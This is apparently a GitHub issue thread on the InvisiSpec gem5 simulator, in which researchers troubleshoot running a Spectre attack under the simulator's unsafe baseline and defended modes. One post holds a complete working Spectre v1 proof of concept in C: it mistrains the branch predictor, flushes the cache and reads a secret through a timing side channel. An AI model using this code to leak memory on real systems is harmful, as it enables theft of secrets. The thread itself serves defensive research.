How to make spectre run in unsafe baseline mode? about invisispec-1.0 HOT 11 OPEN

I'd like to see what changes the InvisiSpec code has done to gem5, but this repo doesn't have the history on what modification has been done, so I tried to rebase the code to a gem5 revision. It's a big change with nearly 3k lines of modifications.
https://git.wehack.space/gem5/commit/?h=invisispec-1.0&id=169588684b179baed4f5f93d8be52c51aa08f06d
I found the code has added the rdtscp in src/arch/x86/isa/insts/system/msrs.py and src/arch/x86/isa/macroop.isa.

from invisispec-1.0.

I've just written a PoC code which evicts all the things in the cache, then use Spectre to read the secret value in the cache. I also rebased the code to a gem5 revision which has rdtscp implementation. (https://git.wehack.space/gem5/log/?h=is-rebase-new3-rdtscp) My attack code is as follows:

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>

/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
#define LLC_SIZE (2 << 20)

uint8_t dummy[LLC_SIZE];
size_t array_size = 4;
uint8_t array1[200] = {1, 2, 3, 4};
uint8_t array2[256 * 64 * 2];
uint8_t X;

uint8_t victim(size_t idx)
{
	if (idx < array_size) {
		return array2[array1[idx] * 64];
	}
}

int main()
{
	unsigned long t[256];
	volatile uint8_t x;

	victim(0);
	victim(0);
	victim(0);
	victim(0);
	victim(0);

	memset(dummy, 1, sizeof(dummy)); // flush L2
	X = 123; // set the secret value, and also bring it to cache

	_mm_mfence();

	size_t attack_idx = &X - array1;
	victim(attack_idx);

	for (int i = 0; i < 256; i++) {
		unsigned int junk;
		unsigned long time1 = __rdtscp(&junk);
		x ^= array2[i * 64];
		unsigned long time2 = __rdtscp(&junk);
		t[i] = time2 - time1;
	}

	printf("attack_idx = %ld\n", attack_idx);
	for (int i = 0; i < 256; i++) {
		printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "hit": "miss");
	}
}

When running ./build/X86_MESI_Two_Level/gem5.fast configs/example/se.py --num-cpus=1 --mem-size=4GB --cpu-type=DerivO3CPU --needsTSO=1 --scheme=UnsafeBaseline --ruby -c attack I can see 123: 30, hit and others miss, while changing UnsafeBaseline to SpectreSafeInvisibleSpec, all the lines miss.

from invisispec-1.0.

The version of GEM5 that we started with does not have good support for serializing "rdtscp" instructions, resulting in incorrect measurement of execution time. After hacking the simulator, we made the attack work, but it is required to use 2 "rdtscp" instructions, where the first one works as a "fense" and the second one works as the real "rdtsc" instruction.

We just uploaded the attack code. Please find it under the directory "attack_code".

Also, InvisiSpec requires modifying the cache, and we only did it for MESI_Two_Level.

from invisispec-1.0.

Thank you so much for your response.

Using --caches with --scheme=SpectreSafeInvisibleSpec , gives the below error:
gem5.opt: build/X86_MESI_Two_Level/mem/cache/cache.cc:192: void Cache::satisfyRequest(PacketPtr, CacheBlk*, bool, bool): Assertion `pkt->hasRespData()' failed.
Program aborted at tick 844000

So, I had to use --ruby (the example scripts use ruby too). I ran the below command:
build/X86_MESI_Two_Level/gem5.opt --outdir=m5out configs/example/se.py --cpu-type=DerivO3CPU --needsTSO=0 --scheme=UnsafeBaseline --ruby --l1d_assoc=8 --l2_assoc=16 --l1i_assoc=4 -c spectre_full.
Spectre attack is not working with the above command, where spectre_full is the binary.
for the attack code provided by you.

However, Spectre attack works when I run:
build/X86_MESI_Two_Level/gem5.opt configs/learning_gem5/part1/two_level.py spectre_full
two_level.py creates standard caches instead of ruby simulated caches.

So,could you please let me know how did you run the attack using --ruby. Could you please share the command/script used to run spectre, if possible.

I have tried tweaking various config options as well as CACHE_HIT_THRESHOLD to run the attack with ruby, but without any success. Also, I have tried using most of the config options in run_spec_from_ckpt.sh without success.

from invisispec-1.0.

For the first problem, the InvisiSpec mode only works under ruby mode. It is because we added new transactions, such as the invisible request, validation, exposure (details in the InvisiSpec paper). We only modified the ruby mode to handle these requests. This is why the classical cache mode does not work.

For the second problem, it is wired that the spectre code does not work. We are looking into it, and hopefully can get back to you soon.

from invisispec-1.0.

Thanks for the quick reply.
Would significant changes to the existing code be required to get InvisiSpec mode to work in standard cache mode?

from invisispec-1.0.

I think it requires some changes. Basically, you need to add support to handle these new requests.

from invisispec-1.0.

Could you please confirm this for me:
You ran the attack with scheme as UnsafeBaseline in cache mode and showed your defense against attack with scheme as
SpectreSafeInvisibleSpec in Ruby mode. Am I missing something here?

from invisispec-1.0.

from invisispec-1.0.

Request you to add the branch you used to test the attack code.

from invisispec-1.0.

@mytbk Why is the delay of 20 when I use the above code? Can you run the spectre attack under the option of UnsafeBaseline? This code is a modification of the base mountain on InvisiSpec, but it can run a spectre attack in the case of UnsafeBasiline. https://github.com/gururaj-s/cleanupspec . In this code, clflush and rdtscp seem to work. But there is error under other options.

from invisispec-1.0.